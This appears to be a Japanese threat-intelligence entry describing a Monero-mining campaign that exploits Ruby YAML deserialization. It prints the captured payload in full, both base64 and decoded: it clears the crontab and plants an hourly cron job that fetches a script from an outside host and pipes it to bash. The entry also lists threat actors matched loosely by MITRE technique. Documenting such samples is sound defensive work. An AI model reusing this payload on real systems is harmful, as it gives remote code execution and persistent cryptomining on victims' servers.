Trusted Design

Monero new pool thru XML Ruby deserialized attack

概要

Monero again with a new pool. Try to use XML Ruby deserialized attack to execute root command on a server, here the attempt "<xAdwt type='yaml'>--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection 'LtUgJyxM; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyB3Z2V0IC1WJiZlY2hvICIxICogKiAqICogd2dldCAtcSAtTyAtIGh0dHA6Ly9pbnRlcm5ldHJlc2VhcmNoLmlzL3JvYm90cy50eHQgMj4vZGV2L251bGx8YmFzaCA+L2Rldi9udWxsIDI+JjEifGNyb250YWIgLTt3Z2V0IC1WfHxjdXJsIC1WfGVjaG8gIjEgKiAqICogKiBjdXJsIC1zIGh0dHA6Ly9pbnRlcm5ldHJlc2VhcmNoLmlzL3JvYm90cy50eHQgMj4vZGV2L251bGx8YmFzaCA+L2Rldi9udWxsIDI+JjEifGNyb250YWIgLScpCg==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route segments: [] requirements: :MsLmhhug: :FR: :MKqyF </xAdwt> ------- system('crontab -r; wget -V&&echo "1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1"|crontab -;wget -V||curl -V|echo "1 * * * * curl -s http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1"|crontab -')"

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

このPulseに関連する脅威アクター (事実ベース)

Kimsuky

Score: 8.97
Matched TTPs:
  • T1036.007 - Double File Extension
  • T1036.004 - Masquerade Task or Service
  • T1550.002 - Pass the Hash
MITREへのリンク →

Mustang Panda

Score: 4.13
Matched TTPs:
  • T1036.007 - Double File Extension
MITREへのリンク →

Rocke

Score: 3.84
Matched TTPs:
  • T1053.003 - Cron
MITREへのリンク →

APT5

Score: 3.84
Matched TTPs:
  • T1053.003 - Cron
MITREへのリンク →

APT38

Score: 9.86
Matched TTPs:
  • T1053.003 - Cron
  • T1569.002 - Service Execution
  • T1529 - System Shutdown/Reboot
MITREへのリンク →

Aquatic Panda

Score: 4.84
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1550.002 - Pass the Hash
MITREへのリンク →

FIN7

Score: 4.49
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1569.002 - Service Execution
MITREへのリンク →

FIN13

Score: 4.84
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1550.002 - Pass the Hash
MITREへのリンク →

APT32

Score: 7.24
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1550.002 - Pass the Hash
  • T1569.002 - Service Execution
MITREへのリンク →

Wizard Spider

Score: 7.24
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1550.002 - Pass the Hash
  • T1569.002 - Service Execution
MITREへのリンク →

FIN6

Score: 4.49
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1569.002 - Service Execution
MITREへのリンク →

ZIRCONIUM

Score: 4.84
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1090.003 - Multi-hop Proxy
MITREへのリンク →

Lazarus Group

Score: 5.72
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1529 - System Shutdown/Reboot
MITREへのリンク →

APT41

Score: 7.24
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1550.002 - Pass the Hash
  • T1569.002 - Service Execution
MITREへのリンク →

Ember Bear

Score: 5.49
Matched TTPs:
  • T1090.003 - Multi-hop Proxy
  • T1550.002 - Pass the Hash
MITREへのリンク →

APT28

Score: 10.03
Matched TTPs:
  • T1090.003 - Multi-hop Proxy
  • T1546.015 - Component Object Model Hijacking
  • T1550.002 - Pass the Hash
MITREへのリンク →

APT29

Score: 11.82
Matched TTPs:
  • T1090.003 - Multi-hop Proxy
  • T1090.004 - Domain Fronting
  • T1651 - Cloud Administration Command
MITREへのリンク →

Medusa Group

Score: 8.77
Matched TTPs:
  • T1090.003 - Multi-hop Proxy
  • T1569.002 - Service Execution
  • T1529 - System Shutdown/Reboot
MITREへのリンク →

Volt Typhoon

Score: 6.88
Matched TTPs:
  • T1090.003 - Multi-hop Proxy
  • T1614 - System Location Discovery
MITREへのリンク →

SideCopy

Score: 4.13
Matched TTPs:
  • T1614 - System Location Discovery
MITREへのリンク →

Chimera

Score: 9.68
Matched TTPs:
  • T1556.001 - Domain Controller Authentication
  • T1550.002 - Pass the Hash
  • T1569.002 - Service Execution
MITREへのリンク →

Scattered Spider

Score: 4.54
Matched TTPs:
  • T1538 - Cloud Service Dashboard
MITREへのリンク →

Mustard Tempest

Score: 4.54
Matched TTPs:
  • T1608.006 - SEO Poisoning
MITREへのリンク →

Axiom

Score: 4.54
Matched TTPs:
  • T1001.002 - Steganography
MITREへのリンク →

APT37

Score: 3.62
Matched TTPs:
  • T1529 - System Shutdown/Reboot
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

APT29

Score: 0.71
Matched TTPs:
  • T1090.003 - Multi-hop Proxy
  • T1090.004 - Domain Fronting
  • T1651 - Cloud Administration Command
MITREへのリンク →

APT38

Score: 0.62
Matched TTPs:
  • T1569.002 - Service Execution
  • T1053.003 - Cron
  • T1529 - System Shutdown/Reboot
MITREへのリンク →

APT28

Score: 0.61
Matched TTPs:
  • T1090.003 - Multi-hop Proxy
  • T1550.002 - Pass the Hash
  • T1546.015 - Component Object Model Hijacking
MITREへのリンク →

Chimera

Score: 0.61
Matched TTPs:
  • T1550.002 - Pass the Hash
  • T1569.002 - Service Execution
  • T1556.001 - Domain Controller Authentication
MITREへのリンク →

Kimsuky

Score: 0.55
Matched TTPs:
  • T1036.007 - Double File Extension
  • T1550.002 - Pass the Hash
  • T1036.004 - Masquerade Task or Service
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ


← Pulse一覧に戻る